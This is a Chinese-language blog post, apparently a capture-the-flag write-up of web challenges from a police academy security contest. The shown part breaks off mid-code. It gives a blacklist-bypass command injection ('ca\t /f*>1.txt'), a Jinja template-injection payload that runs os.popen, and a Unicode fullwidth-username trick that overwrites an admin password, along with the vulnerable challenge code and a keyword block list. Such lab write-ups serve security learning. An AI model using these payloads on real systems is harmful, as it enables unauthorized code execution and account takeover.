

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/3.png">
  <link rel="icon" href="/img/3.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="AzumiSaki">
  <meta name="keywords" content="">
  
    <meta name="description" content="前言不得不说，这真的是很久以来打的最爽的一次ctf了，题目出得真的好 ezshell这题进去后直接给出了源代码： 12345678910&lt;?phphighlight_file(__file__);$black_list&#x3D;[&#x27;eval&#x27;,&#x27;system&#x27;,&#x27;cat&#x27;,&#x27;tac&#x27;,&#x27;ls&#x27;,&amp;#x">
<meta property="og:type" content="article">
<meta property="og:title" content="浙江警察学院第九届信息网络安全竞赛-web全解wp">
<meta property="og:url" content="https://azumisaki.github.io/2026/06/07/%E6%B5%99%E6%B1%9F%E8%AD%A6%E5%AF%9F%E5%AD%A6%E9%99%A2%E7%AC%AC%E4%B9%9D%E5%B1%8A%E4%BF%A1%E6%81%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B/index.html">
<meta property="og:site_name" content="Saki的博客">
<meta property="og:description" content="前言不得不说，这真的是很久以来打的最爽的一次ctf了，题目出得真的好 ezshell这题进去后直接给出了源代码： 12345678910&lt;?phphighlight_file(__file__);$black_list&#x3D;[&#x27;eval&#x27;,&#x27;system&#x27;,&#x27;cat&#x27;,&#x27;tac&#x27;,&#x27;ls&#x27;,&amp;#x">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://azumisaki.github.io/img/14.jpg">
<meta property="article:published_time" content="2026-06-07T09:00:39.000Z">
<meta property="article:modified_time" content="2026-06-07T11:28:41.071Z">
<meta property="article:author" content="AzumiSaki">
<meta property="article:tag" content="-wp">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://azumisaki.github.io/img/14.jpg">
  
  
  
  <title>浙江警察学院第九届信息网络安全竞赛-web全解wp - Saki的博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"azumisaki.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<!-- hexo injector head_end start --><link rel="stylesheet" href="/css/custom.css"><!-- hexo injector head_end end --><meta name="generator" content="Hexo 8.1.1"></head>


<body><!-- hexo injector body_begin start --><div id="global-fx-layer"></div><!-- hexo injector body_begin end -->
  

  <header>
    

<div class="header-inner" style="height: 100vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Saki的博客</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/14.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.5)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="浙江警察学院第九届信息网络安全竞赛-web全解wp"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-06-07 17:00" pubdate>
          2026年6月7日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          18 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
        <div class="scroll-down-bar">
          <i class="iconfont icon-arrowdown"></i>
        </div>
      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">浙江警察学院第九届信息网络安全竞赛-web全解wp</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2026年6月7日 晚上
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>不得不说，这真的是很久以来打的最爽的一次ctf了，题目出得真的好</p>
<h2 id="ezshell"><a href="#ezshell" class="headerlink" title="ezshell"></a>ezshell</h2><p>这题进去后直接给出了源代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(__file__);<br><span class="hljs-variable">$black_list</span>=[<span class="hljs-string">&#x27;eval&#x27;</span>,<span class="hljs-string">&#x27;system&#x27;</span>,<span class="hljs-string">&#x27;cat&#x27;</span>,<span class="hljs-string">&#x27;tac&#x27;</span>,<span class="hljs-string">&#x27;ls&#x27;</span>,<span class="hljs-string">&#x27;tail&#x27;</span>,<span class="hljs-string">&#x27;more&#x27;</span>,<span class="hljs-string">&#x27;less&#x27;</span>,<span class="hljs-string">&#x27;nl&#x27;</span>];<br><span class="hljs-variable">$a</span>=<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;t0mcater&#x27;</span>];<br><span class="hljs-keyword">for</span>(<span class="hljs-variable">$i</span>=<span class="hljs-number">0</span>;<span class="hljs-variable">$i</span>&lt;<span class="hljs-number">9</span>;<span class="hljs-variable">$i</span>++)&#123;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">strpos</span>(<span class="hljs-variable">$a</span>, <span class="hljs-variable">$black_list</span>[<span class="hljs-variable">$i</span>]) !== <span class="hljs-literal">false</span>)&#123;<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;bad hacker!&quot;</span>);<br>    &#125;<br>&#125;<br><span class="hljs-title function_ invoke__">shell_exec</span>(<span class="hljs-variable">$a</span>);<br></code></pre></td></tr></table></figure>

<p>看了一下，发现黑名单禁用了<code>[&#39;eval&#39;,&#39;system&#39;,&#39;cat&#39;,&#39;tac&#39;,&#39;ls&#39;,&#39;tail&#39;,&#39;more&#39;,&#39;less&#39;,&#39;nl&#39;]</code>，但是没禁、等一系列符号，所以可以试试ca\t &#x2F;f*，发现没被过滤，但是没回显，所以将其导出至1.txt</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ca\t /f*&gt;1.txt<br></code></pre></td></tr></table></figure>

<p>访问&#x2F;1.txt得到flag</p>
<p><img src="/img/%E6%B5%99%E6%B1%9F%E8%AD%A6%E5%AF%9F%E5%AD%A6%E9%99%A2%E7%AC%AC%E4%B9%9D%E5%B1%8A%E4%BF%A1%E6%81%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B/1.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="babyssti"><a href="#babyssti" class="headerlink" title="babyssti"></a>babyssti</h2><p>点开就是一个查询框，随便输入一个payload<code>&#123;&#123;1+1&#125;&#125;</code>，回显HELLO 2，然后先探测config</p>
<p><img src="/img/%E6%B5%99%E6%B1%9F%E8%AD%A6%E5%AF%9F%E5%AD%A6%E9%99%A2%E7%AC%AC%E4%B9%9D%E5%B1%8A%E4%BF%A1%E6%81%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B/2.png" srcset="/img/loading.gif" lazyload></p>
<p>可以发现没做长度限制，且放得很宽，那我们就可以先试试基础的payload</p>
<p>可以看到直接把模块都泄露出来了：<br><img src="/img/%E6%B5%99%E6%B1%9F%E8%AD%A6%E5%AF%9F%E5%AD%A6%E9%99%A2%E7%AC%AC%E4%B9%9D%E5%B1%8A%E4%BF%A1%E6%81%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B/3.png" srcset="/img/loading.gif" lazyload></p>
<p>整理一下，找找rce——找到一个popen在第360行，于是构造payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>.__class__.__base__.<span class="hljs-title function_ invoke__">__subclasses__</span>()[<span class="hljs-number">360</span>].__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-string">&#x27;eval&#x27;</span>](<span class="hljs-string">&#x27;__import__(&quot;os&quot;).popen(&quot;ls /&quot;).read()&#x27;</span>)&#125;&#125;<br></code></pre></td></tr></table></figure>

<p>发现执行成功</p>
<p><img src="/img/%E6%B5%99%E6%B1%9F%E8%AD%A6%E5%AF%9F%E5%AD%A6%E9%99%A2%E7%AC%AC%E4%B9%9D%E5%B1%8A%E4%BF%A1%E6%81%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B/4.png" srcset="/img/loading.gif" lazyload></p>
<p>直接cat &#x2F;flag.txt</p>
<p><img src="/img/%E6%B5%99%E6%B1%9F%E8%AD%A6%E5%AF%9F%E5%AD%A6%E9%99%A2%E7%AC%AC%E4%B9%9D%E5%B1%8A%E4%BF%A1%E6%81%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B/5.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="react2shell"><a href="#react2shell" class="headerlink" title="react2shell"></a>react2shell</h2><p>这题看名字都知道是CVE复现，复现的是CVE-2025-55182</p>
<p>直接上网搜poc拿flag</p>
<p><img src="/img/%E6%B5%99%E6%B1%9F%E8%AD%A6%E5%AF%9F%E5%AD%A6%E9%99%A2%E7%AC%AC%E4%B9%9D%E5%B1%8A%E4%BF%A1%E6%81%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B/6.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="myblog"><a href="#myblog" class="headerlink" title="myblog"></a>myblog</h2><p>这道题打开是一个博客页面，看到app.py</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask, render_template, session, redirect, url_for<br><br>app = Flask(__name__)<br>app.config[<span class="hljs-string">&#x27;SECRET_KEY&#x27;</span>] = <span class="hljs-string">&#x27;test&#x27;</span> <span class="hljs-comment">#fake_key</span><br><br><span class="hljs-keyword">from</span> auth.routes <span class="hljs-keyword">import</span> auth_bp<br><span class="hljs-keyword">from</span> blog.routes <span class="hljs-keyword">import</span> blog_bp<br>app.register_blueprint(auth_bp)<br>app.register_blueprint(blog_bp)<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/&quot;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>():<br>    <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;hello.html&#x27;</span>)<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/blog&quot;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">blog</span>():<br>    user = session.get(<span class="hljs-string">&#x27;user&#x27;</span>)<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> user:<br>        <span class="hljs-keyword">return</span> redirect(url_for(<span class="hljs-string">&#x27;auth.login&#x27;</span>))<br>    is_admin = (user == <span class="hljs-string">&#x27;admin&#x27;</span>)<br>    <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&quot;hello.html&quot;</span>, username=user, is_admin=is_admin)<br><br><span class="hljs-keyword">if</span> __name__==<span class="hljs-string">&quot;__main__&quot;</span>:<br>    app.run(host=<span class="hljs-string">&quot;0.0.0.0&quot;</span>, port=<span class="hljs-number">8080</span>)<br></code></pre></td></tr></table></figure>

<p>发现有后台接口，当user为admin的时候就放行</p>
<p>看到注册附件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask, Blueprint, request, session, flash, redirect, url_for, render_template<br><span class="hljs-keyword">import</span> unicodedata<br>auth_bp=Blueprint(<span class="hljs-string">&#x27;auth&#x27;</span>,__name__)<br>user_db=&#123;<span class="hljs-string">&quot;admin&quot;</span>:<span class="hljs-string">&quot;test&quot;</span>&#125;<span class="hljs-comment">#password is fake</span><br><span class="hljs-meta">@auth_bp.route(<span class="hljs-params"><span class="hljs-string">&#x27;/register&#x27;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">register</span>():<br>    <span class="hljs-keyword">if</span> request.method == <span class="hljs-string">&#x27;POST&#x27;</span>:<br>        username = request.form.get(<span class="hljs-string">&#x27;username&#x27;</span>)<br>        password=request.form.get(<span class="hljs-string">&#x27;password&#x27;</span>)<br>        <span class="hljs-keyword">if</span> username == <span class="hljs-string">&#x27;admin&#x27;</span>:<br>            flash(<span class="hljs-string">&quot;想得美&quot;</span>)<br>            <span class="hljs-keyword">return</span> redirect(url_for(<span class="hljs-string">&#x27;auth.register&#x27;</span>))<br>        normalized_name = unicodedata.normalize(<span class="hljs-string">&#x27;NFKC&#x27;</span>, username).lower()        <br>        flash(<span class="hljs-string">f&quot;注册并登录成功，欢迎：<span class="hljs-subst">&#123;normalized_name&#125;</span>&quot;</span>)<br>        user_db[normalized_name]=password<br>        <span class="hljs-keyword">return</span> redirect(url_for(<span class="hljs-string">&#x27;auth.login&#x27;</span>))<br><br>    <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;register.html&#x27;</span>)<br><br><span class="hljs-meta">@auth_bp.route(<span class="hljs-params"><span class="hljs-string">&#x27;/login&#x27;</span>,methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">login</span>():<br>	<span class="hljs-keyword">if</span> request.method ==<span class="hljs-string">&#x27;POST&#x27;</span>:<br>		username=request.form.get(<span class="hljs-string">&quot;username&quot;</span>)<br>		password=request.form.get(<span class="hljs-string">&quot;password&quot;</span>)<br>		<span class="hljs-keyword">if</span> user_db.get(username)==password:<br>			session[<span class="hljs-string">&#x27;user&#x27;</span>]=username<br>			flash(<span class="hljs-string">f&#x27;welcome <span class="hljs-subst">&#123;username&#125;</span>!&#x27;</span>)<br>			<span class="hljs-keyword">return</span> redirect(url_for(<span class="hljs-string">&#x27;blog.view&#x27;</span>))<br>		<span class="hljs-keyword">else</span>:<br>			flash(<span class="hljs-string">&#x27;wrong!!!&#x27;</span>)<br>			<span class="hljs-keyword">return</span> redirect(url_for(<span class="hljs-string">&#x27;auth.login&#x27;</span>))<br>	<span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;login.html&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>看到关键代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">register</span>():<br>    <span class="hljs-keyword">if</span> request.method == <span class="hljs-string">&#x27;POST&#x27;</span>:<br>        username = request.form.get(<span class="hljs-string">&#x27;username&#x27;</span>)<br>        password=request.form.get(<span class="hljs-string">&#x27;password&#x27;</span>)<br>        <span class="hljs-keyword">if</span> username == <span class="hljs-string">&#x27;admin&#x27;</span>:<br>            flash(<span class="hljs-string">&quot;想得美&quot;</span>)<br>            <span class="hljs-keyword">return</span> redirect(url_for(<span class="hljs-string">&#x27;auth.register&#x27;</span>))<br>        normalized_name = unicodedata.normalize(<span class="hljs-string">&#x27;NFKC&#x27;</span>, username).lower()        <br>        flash(<span class="hljs-string">f&quot;注册并登录成功，欢迎：<span class="hljs-subst">&#123;normalized_name&#125;</span>&quot;</span>)<br>        user_db[normalized_name]=password<br>        <span class="hljs-keyword">return</span> redirect(url_for(<span class="hljs-string">&#x27;auth.login&#x27;</span>))<br><br>    <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;register.html&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>当username&#x3D;&#x3D;admin的时候flash想得美，用的是<code>==</code>弱比较，可以试试全角宽字符代替注册来更改admin密码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">halfwidth_to_fullwidth</span>(<span class="hljs-params">text</span>):<br>    <span class="hljs-string">&quot;&quot;&quot;半角转全角&quot;&quot;&quot;</span><br>    result = <span class="hljs-string">&quot;&quot;</span><br>    <span class="hljs-keyword">for</span> char <span class="hljs-keyword">in</span> text:<br>        code = <span class="hljs-built_in">ord</span>(char)<br><br>        <span class="hljs-comment"># 半角空格</span><br>        <span class="hljs-keyword">if</span> code == <span class="hljs-number">0x20</span>:<br>            code = <span class="hljs-number">0x3000</span><br>        <span class="hljs-comment"># 可转换的 ASCII 字符</span><br>        <span class="hljs-keyword">elif</span> <span class="hljs-number">0x21</span> &lt;= code &lt;= <span class="hljs-number">0x7E</span>:<br>            code += <span class="hljs-number">0xFEE0</span><br><br>        result += <span class="hljs-built_in">chr</span>(code)<br><br>    <span class="hljs-keyword">return</span> result<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">fullwidth_to_halfwidth</span>(<span class="hljs-params">text</span>):<br>    <span class="hljs-string">&quot;&quot;&quot;全角转半角&quot;&quot;&quot;</span><br>    result = <span class="hljs-string">&quot;&quot;</span><br>    <span class="hljs-keyword">for</span> char <span class="hljs-keyword">in</span> text:<br>        code = <span class="hljs-built_in">ord</span>(char)<br><br>        <span class="hljs-comment"># 全角空格</span><br>        <span class="hljs-keyword">if</span> code == <span class="hljs-number">0x3000</span>:<br>            code = <span class="hljs-number">0x20</span><br>        <span class="hljs-comment"># 可转换的全角字符</span><br>        <span class="hljs-keyword">elif</span> <span class="hljs-number">0xFF01</span> &lt;= code &lt;= <span class="hljs-number">0xFF5E</span>:<br>            code -= <span class="hljs-number">0xFEE0</span><br><br>        result += <span class="hljs-built_in">chr</span>(code)<br><br>    <span class="hljs-keyword">return</span> result<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&quot;__main__&quot;</span>:<br>    s = <span class="hljs-string">&quot;admin&quot;</span><br><br>    wide = halfwidth_to_fullwidth(s)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;全角:&quot;</span>, wide)<br><br>    narrow = fullwidth_to_halfwidth(wide)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;半角:&quot;</span>, narrow)<br></code></pre></td></tr></table></figure>

<p>拿到ａｄｍｉｎ，尝试去注册登录，成功</p>
<p><img src="/img/%E6%B5%99%E6%B1%9F%E8%AD%A6%E5%AF%9F%E5%AD%A6%E9%99%A2%E7%AC%AC%E4%B9%9D%E5%B1%8A%E4%BF%A1%E6%81%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B/7.png" srcset="/img/loading.gif" lazyload></p>
<p>进入实验室后发现考的是pyjail，故先分析源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Blueprint, request, session, flash, redirect, url_for, render_template<br><span class="hljs-keyword">import</span> sys<br><span class="hljs-keyword">import</span> io<br><br>blog_bp = Blueprint(<span class="hljs-string">&#x27;blog&#x27;</span>, __name__)<br><br><span class="hljs-meta">@blog_bp.route(<span class="hljs-params"><span class="hljs-string">&#x27;/blog&#x27;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">view</span>():<br>    user = session.get(<span class="hljs-string">&#x27;user&#x27;</span>)<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> user:<br>        <span class="hljs-keyword">return</span> redirect(url_for(<span class="hljs-string">&#x27;auth.login&#x27;</span>))<br>    is_admin = (user == <span class="hljs-string">&#x27;admin&#x27;</span>)<br>    <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;view.html&#x27;</span>, username=user, is_admin=is_admin)<br><br><span class="hljs-meta">@blog_bp.route(<span class="hljs-params"><span class="hljs-string">&#x27;/execute&#x27;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">sandbox</span>():<br>    <span class="hljs-keyword">if</span> session.get(<span class="hljs-string">&#x27;user&#x27;</span>) != <span class="hljs-string">&#x27;admin&#x27;</span>:<br>        flash(<span class="hljs-string">&quot;npnpnp&quot;</span>)<br>        <span class="hljs-keyword">return</span> redirect(url_for(<span class="hljs-string">&#x27;blog.view&#x27;</span>))<br><br>    output = <span class="hljs-string">&quot;&quot;</span><br>    <span class="hljs-keyword">if</span> request.method == <span class="hljs-string">&#x27;POST&#x27;</span>:<br>        code = request.form.get(<span class="hljs-string">&#x27;code&#x27;</span>) <br>        safe_globals = &#123;<span class="hljs-string">&quot;__builtins__&quot;</span>: &#123;&#125;&#125;<br>        <br>        <span class="hljs-comment"># 捕获输出</span><br>        original_stdout = sys.stdout<br>        sys.stdout = io.StringIO()<br>        <br>        <span class="hljs-keyword">try</span>:<br>            <span class="hljs-built_in">exec</span>(code, safe_globals)<br>            output = sys.stdout.getvalue()<br>        <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>            output = <span class="hljs-string">f&quot;Error: <span class="hljs-subst">&#123;<span class="hljs-built_in">str</span>(e)&#125;</span>&quot;</span><br>        <span class="hljs-keyword">finally</span>:<br>            sys.stdout = original_stdout<br><br>        <span class="hljs-keyword">return</span> render_template(<span 